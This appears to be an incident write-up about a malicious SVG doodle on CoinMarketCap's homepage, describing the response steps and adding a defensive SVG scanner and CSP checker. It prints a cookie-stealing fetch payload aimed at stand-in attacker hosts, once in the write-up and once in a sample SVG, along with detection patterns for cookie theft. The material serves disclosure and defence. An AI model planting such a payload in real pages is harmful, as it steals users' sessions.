On June 20, 2025, CoinMarketCap’s security team identified and contained a sophisticated attack vector involving a compromised doodle image on the platform’s homepage.
When loaded, the malicious SVG/JavaScript payload triggered unauthorized API calls (POST /api/renderDoodle) and performed cross-origin resource fetching (CORF), which generated unexpected pop-ups for users.
This client-side script injection exploited the browser’s same-origin policy weaknesses, though no backend systems were breached.
SVG Payload with Embedded JavaScript
The weaponized doodle contained obfuscated JavaScript within an SVG <script> tag:

```javascript
// Reads the page's cookies and POSTs them to an attacker-controlled server,
// then opens the phishing pop-up users saw.
fetch('https://malicious-domain.tld/api', {
  method: 'POST',
  body: JSON.stringify({cookies: document.cookie})
}).then(() => window.open('phishing-page.html'))
```
This code harvested session cookies via document.cookie and exfiltrated them to attacker-controlled servers before triggering pop-ups.
The attack leveraged SVG’s ability to execute JavaScript while masquerading as benign imagery, bypassing initial content security policy (CSP) checks.
Incident Response and Containment
CoinMarketCap’s security operations center (SOC) executed a four-phase containment protocol within 17 minutes of detection:
- Immediate Takedown: Disabled the homepage_doodle_loader microservice (v3.2.1) and purged CDN caches globally.
- Forensic Analysis: Reviewed CloudTrail logs and Lambda execution histories to confirm zero data exfiltration from backend systems.
- Patch Deployment: Implemented stricter CSP headers (script-src 'self'; object-src 'none') and SVG sanitization using DOMPurify v3.0.
- Threat Hunting: Scanned all user-uploaded content with YARA rules to detect similar payload patterns.
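The following is an added example, not CoinMarketCap's code, showing two pre-deployment checks that correspond to the Patch Deployment and Threat Hunting steps above: a triage screen that flags active content in SVG assets (a cheap first pass before DOMPurify-style sanitization, not a replacement for it), and a check that a CSP header forbids the inline script and plugin content the doodle payload relied on. The rule ids, sample SVGs and headers are constructed for the demo.

```javascript
// Added example, not CoinMarketCap's code. scanSvg() screens an SVG for active
// content; cspReport() checks a CSP header against the hardened policy above.

// Rule ids and patterns are constructed for this example. Regex screening is a
// triage signal only; sanitize with a real parser (e.g. DOMPurify) before serving.
const ACTIVE_CONTENT_RULES = [
  { id: 'script-element', re: /<script\b/i },
  { id: 'event-handler',  re: /\son[a-z]+\s*=/i },
  { id: 'javascript-url', re: /(?:href|xlink:href)\s*=\s*["']\s*javascript:/i },
  { id: 'foreign-object', re: /<foreignObject\b/i },
  { id: 'external-fetch', re: /\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon/i },
  { id: 'cookie-access',  re: /document\.cookie/i },
  { id: 'popup',          re: /window\.open\s*\(/i },
];

// Returns the ids of every rule that fires. An empty array means "nothing
// obviously active", which is a reason to lower priority, not proof of safety.
function scanSvg(svgText) {
  return ACTIVE_CONTENT_RULES.filter(r => r.re.test(svgText)).map(r => r.id);
}

// Parse "name value value; name value" into { name: [values] }. Quoted
// keywords ('self', 'none', 'unsafe-inline') are lower-cased for comparison.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const [name, ...values] = part.trim().split(/\s+/).filter(Boolean);
    if (!name) continue;
    directives[name.toLowerCase()] = values.map(v => (v.startsWith("'") ? v.toLowerCase() : v));
  }
  return directives;
}

// script-src and object-src fall back to default-src, as browsers do.
function cspReport(header) {
  const d = parseCsp(header);
  const scriptSrc = d['script-src'] || d['default-src'] || [];
  const objectSrc = d['object-src'] || d['default-src'] || [];
  return {
    // An inline <script> only runs when 'unsafe-inline' is allowed (nonce and
    // hash allow-lists are out of scope for this simple check).
    inlineScriptBlocked: scriptSrc.length > 0 && !scriptSrc.includes("'unsafe-inline'"),
    pluginsBlocked: objectSrc.length === 1 && objectSrc[0] === "'none'",
  };
}

// Constructed samples: a plain doodle and one carrying the kind of payload the
// write-up describes (attacker host is a placeholder).
const BENIGN_SVG =
  '<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">' +
  '<circle cx="50" cy="50" r="40" fill="orange"/>' +
  '<text x="10" y="90" font-size="12">Doodle</text></svg>';

const MALICIOUS_SVG = [
  '<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">',
  '  <rect width="200" height="100" fill="#fff" onload="init()"/>',
  '  <script>',
  "    fetch('https://attacker.invalid/api', {method: 'POST',",
  "      body: JSON.stringify({cookies: document.cookie})})",
  "      .then(() => window.open('phishing-page.html'));",
  '  </script>',
  '</svg>',
].join('\n');

const HARDENED_CSP = "script-src 'self'; object-src 'none'";
const WEAK_CSP = "default-src *; script-src 'self' 'unsafe-inline'";

console.log('benign   :', scanSvg(BENIGN_SVG));
console.log('malicious:', scanSvg(MALICIOUS_SVG));
console.log('hardened :', cspReport(HARDENED_CSP));
console.log('weak     :', cspReport(WEAK_CSP));
```

One caveat on where the header must be set: a CSP governs the document it is delivered with. Inline SVG in the homepage HTML is covered by the page's policy, but an SVG loaded as its own document (via <object>, <iframe> or direct navigation) is governed by the header on the SVG response, so the policy needs to be applied to static-asset responses as well as to the HTML. An SVG referenced from an <img> tag never executes script regardless of policy.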
Enhanced Security Measures
Post-incident, CoinMarketCap deployed three key upgrades:
- Runtime Protection: Added real-time behavior monitoring via AWS WAF rules blocking anomalous window.open() and fetch() patterns.
- Content Validation: Implemented cryptographic asset signing using Ed25519 keys for all static content.
- Bug Bounty Expansion: Increased maximum rewards to $100,000 for DOM-XSS vulnerabilities through HackerOne.
All systems were fully restored within 2 hours, with comprehensive audits confirming no persistent threats.
CoinMarketCap’s transparent disclosure and rapid response demonstrate robust security practices, though the incident underscores evolving risks in dynamic web content.